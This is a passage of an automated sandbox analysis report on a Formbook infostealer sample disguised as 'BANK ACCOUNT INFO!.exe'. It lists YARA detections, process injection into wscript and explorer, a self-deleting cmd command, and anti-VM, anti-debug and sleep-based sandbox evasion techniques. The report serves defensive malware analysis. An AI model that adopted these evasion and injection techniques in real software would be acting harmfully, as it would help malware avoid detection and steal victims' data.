Source: C:\Windows\SysWOW64\wscript.exe	Code function: 4_2_04B223E3
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 4_2_04B3DBD2
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 4_2_04B303DA
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 4_2_04AAABD8
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 4_2_04B42B28
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 4_2_04A9A309
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 4_2_04A9AB40
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 4_2_04B1CB4F
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 4_2_005DD853
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 4_2_005DD816
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 4_2_005DD38E
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 4_2_005C2D90
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 4_2_005C2D88
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 4_2_005C9E30
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 4_2_005DE73A
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 4_2_005C2FB0

Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Code function: String function: 0147B150 appears 136 times
Source: C:\Windows\SysWOW64\wscript.exe	Code function: String function: 04A7B150 appears 145 times

Source: BANK ACCOUNT INFO!.exe	Binary or memory string: OriginalFilename vs BANK ACCOUNT INFO!.exe
Source: BANK ACCOUNT INFO!.exe, 00000000.00000002.215904460.0000000005A50000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameKedermister.dllT vs BANK ACCOUNT INFO!.exe
Source: BANK ACCOUNT INFO!.exe	Binary or memory string: OriginalFilename vs BANK ACCOUNT INFO!.exe
Source: BANK ACCOUNT INFO!.exe, 00000001.00000002.258458802.000000000156F000.00000040.00000001.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs BANK ACCOUNT INFO!.exe
Source: BANK ACCOUNT INFO!.exe, 00000001.00000002.260642680.0000000003250000.00000040.00000001.sdmp	Binary or memory string: OriginalFilenamewscript.exe` vs BANK ACCOUNT INFO!.exe
Source: BANK ACCOUNT INFO!.exe	Binary or memory string: OriginalFilenametymo.exeN vs BANK ACCOUNT INFO!.exe

Source: 00000004.00000002.475693377.0000000002EF0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.475693377.0000000002EF0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000002.258154608.0000000001000000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000001.00000002.258154608.0000000001000000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.475792839.0000000002F20000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.475792839.0000000002F20000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.473464239.00000000005C0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.473464239.00000000005C0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000002.257924121.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000001.00000002.257924121.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000002.258303947.0000000001420000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000001.00000002.258303947.0000000001420000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.214389513.00000000038B9000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.214389513.00000000038B9000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 1.2.BANK ACCOUNT INFO!.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 1.2.BANK ACCOUNT INFO!.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 1.2.BANK ACCOUNT INFO!.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 1.2.BANK ACCOUNT INFO!.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research

Source: BANK ACCOUNT INFO!.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: classification engine

Classification label: mal100.troj.evad.winEXE@7/1@4/3

Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\BANK ACCOUNT INFO!.exe.log

Jump to behavior

Source: C:\Windows\System32\conhost.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2212:120:WilError_01

Source: BANK ACCOUNT INFO!.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe

Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll

Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: BANK ACCOUNT INFO!.exe	Virustotal: Detection: 21%
Source: BANK ACCOUNT INFO!.exe	ReversingLabs: Detection: 10%

Source: unknown	Process created: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe 'C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe'
Source: unknown	Process created: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe
Source: unknown	Process created: C:\Windows\SysWOW64\wscript.exe C:\Windows\SysWOW64\wscript.exe
Source: unknown	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe'
Source: unknown	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Process created: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe'

Source: C:\Windows\explorer.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6C3EE638-B588-4D7D-B30A-E7E36759305D}\InprocServer32

Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Source: BANK ACCOUNT INFO!.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: BANK ACCOUNT INFO!.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source:	Binary string: wscript.pdbGCTL source: BANK ACCOUNT INFO!.exe, 00000001.00000002.260642680.0000000003250000.00000040.00000001.sdmp
Source:	Binary string: wntdll.pdbUGP source: BANK ACCOUNT INFO!.exe, 00000001.00000002.258458802.000000000156F000.00000040.00000001.sdmp, wscript.exe, 00000004.00000002.476368319.0000000004A50000.00000040.00000001.sdmp
Source:	Binary string: wntdll.pdb source: BANK ACCOUNT INFO!.exe, wscript.exe
Source:	Binary string: wscript.pdb source: BANK ACCOUNT INFO!.exe, 00000001.00000002.260642680.0000000003250000.00000040.00000001.sdmp

Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Code function: 1_2_0041D075 push eax; ret
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Code function: 1_2_0041C802 push esi; iretd
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Code function: 1_2_0041D0C2 push eax; ret
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Code function: 1_2_0041D0CB push eax; ret
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Code function: 1_2_0041E172 pushfd ; ret
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Code function: 1_2_0041D12C push eax; ret
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Code function: 1_2_004182CC push cs; retf
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Code function: 1_2_0041E4F5 push dword ptr [537421FAh]; ret
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Code function: 1_2_00419C92 pushfd ; iretd
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Code function: 1_2_0041674D push 8EAE14C8h; iretd
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Code function: 1_2_004167AE push C6E9D42Ah; ret
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Code function: 1_2_014CD0D1 push ecx; ret
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 4_2_04ACD0D1 push ecx; ret
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 4_2_005DD075 push eax; ret
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 4_2_005DC802 push esi; iretd
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 4_2_005DD0CB push eax; ret
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 4_2_005DD0C2 push eax; ret
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 4_2_005DE172 pushfd ; ret
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 4_2_005DD12C push eax; ret
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 4_2_005D82CC push cs; retf
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 4_2_005DE4F5 push dword ptr [537421FAh]; ret
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 4_2_005D9C92 pushfd ; iretd
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 4_2_005D674D push 8EAE14C8h; iretd
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 4_2_005D67AE push C6E9D42Ah; ret

Source: initial sample

Static PE information: section name: .text entropy: 7.82664888308

Hooking and other Techniques for Hiding and Protection:

Modifies the prolog of user mode functions (user mode inline hooks)

Show sources

Source: explorer.exe

User mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x87 0x7E 0xE6

Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Yara detected AntiVM_3

Show sources

Source: Yara match	File source: 00000000.00000002.214093011.00000000028F7000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.213965097.00000000028B1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: BANK ACCOUNT INFO!.exe PID: 5264, type: MEMORY

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Show sources

Source: BANK ACCOUNT INFO!.exe, 00000000.00000002.214093011.00000000028F7000.00000004.00000001.sdmp	Binary or memory string: SBIEDLL.DLL
Source: BANK ACCOUNT INFO!.exe, 00000000.00000002.214093011.00000000028F7000.00000004.00000001.sdmp	Binary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME

Tries to detect virtualization through RDTSC time measurements

Show sources

Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	RDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	RDTSC instruction interceptor: First address: 0000000000409B4E second address: 0000000000409B54 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\wscript.exe	RDTSC instruction interceptor: First address: 00000000005C98E4 second address: 00000000005C98EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\wscript.exe	RDTSC instruction interceptor: First address: 00000000005C9B4E second address: 00000000005C9B54 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc

Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe

Code function: 1_2_00409A80 rdtsc

Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe

Thread delayed: delay time: 922337203685477

Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe TID: 5936	Thread sleep time: -49237s >= -30000s
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe TID: 6096	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\explorer.exe TID: 6376	Thread sleep count: 36 > 30
Source: C:\Windows\explorer.exe TID: 6376	Thread sleep time: -72000s >= -30000s
Source: C:\Windows\SysWOW64\wscript.exe TID: 4464	Thread sleep time: -48000s >= -30000s

Source: C:\Windows\explorer.exe	Last function: Thread delayed
Source: C:\Windows\explorer.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\wscript.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\wscript.exe	Last function: Thread delayed

Source: explorer.exe, 00000002.00000000.229544936.000000000871F000.00000004.00000001.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
Source: explorer.exe, 00000002.00000000.229544936.000000000871F000.00000004.00000001.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000:
Source: BANK ACCOUNT INFO!.exe, 00000000.00000002.214093011.00000000028F7000.00000004.00000001.sdmp	Binary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: explorer.exe, 00000002.00000000.228899034.0000000008220000.00000002.00000001.sdmp	Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: explorer.exe, 00000002.00000000.229324948.0000000008640000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: BANK ACCOUNT INFO!.exe, 00000000.00000002.214093011.00000000028F7000.00000004.00000001.sdmp	Binary or memory string: vmware
Source: BANK ACCOUNT INFO!.exe, 00000000.00000002.214093011.00000000028F7000.00000004.00000001.sdmp	Binary or memory string: VMware SVGA II\|update users set password = @password where user_id = @user_id
Source: explorer.exe, 00000002.00000002.487079470.00000000055D0000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}V*(E
Source: explorer.exe, 00000002.00000000.229544936.000000000871F000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}~
Source: explorer.exe, 00000002.00000000.229544936.000000000871F000.00000004.00000001.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
Source: explorer.exe, 00000002.00000000.229616866.00000000087D1000.00000004.00000001.sdmp	Binary or memory string: VMware SATA CD00ices
Source: explorer.exe, 00000002.00000002.487119662.0000000005603000.00000004.00000001.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b},
Source: explorer.exe, 00000002.00000003.292352680.0000000008A13000.00000004.00000001.sdmp	Binary or memory string: -b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATAY
Source: explorer.exe, 00000002.00000000.228899034.0000000008220000.00000002.00000001.sdmp	Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: explorer.exe, 00000002.00000000.228899034.0000000008220000.00000002.00000001.sdmp	Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: BANK ACCOUNT INFO!.exe, 00000000.00000002.214093011.00000000028F7000.00000004.00000001.sdmp	Binary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
Source: explorer.exe, 00000002.00000000.228899034.0000000008220000.00000002.00000001.sdmp	Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe

Process information queried: ProcessInformation

Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Process queried: DebugPort
Source: C:\Windows\SysWOW64\wscript.exe	Process queried: DebugPort

Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe

Code function: 1_2_00409A80 rdtsc

Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe

Code function: 1_2_0040ACC0 LdrLoadDll,

Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Code function: 1_2_0149B944 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Code function: 1_2_0149B944 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Code function: 1_2_0147C962 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Code function: 1_2_0147B171 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Code function: 1_2_0147B171 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Code function: 1_2_01479100 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Code function: 1_2_01479100 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Code function: 1_2_01479100 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Code function: 1_2_01494120 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Code function: 1_2_01494120 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Code function: 1_2_01494120 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Code function: 1_2_01494120 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Code function: 1_2_01494120 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Code function: 1_2_014A513A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Code function: 1_2_014A513A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Code function: 1_2_0147B1E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Code function: 1_2_0147B1E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Code function: 1_2_0147B1E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Code function: 1_2_015041E8 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Code function: 1_2_0149C182 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Code function: 1_2_014AA185 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Code function: 1_2_014A2990 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Code function: 1_2_014F69A6 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Code function: 1_2_014A61A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Code function: 1_2_014A61A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Code function: 1_2_014F51BE mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Code function: 1_2_014F51BE mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Code function: 1_2_014F51BE mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Code function: 1_2_014F51BE mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Code function: 1_2_014999BF mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Code function: 1_2_014999BF mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Code function: 1_2_014999BF mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Code function: 1_2_014999BF mov ecx, dword ptr fs:[00000030h]
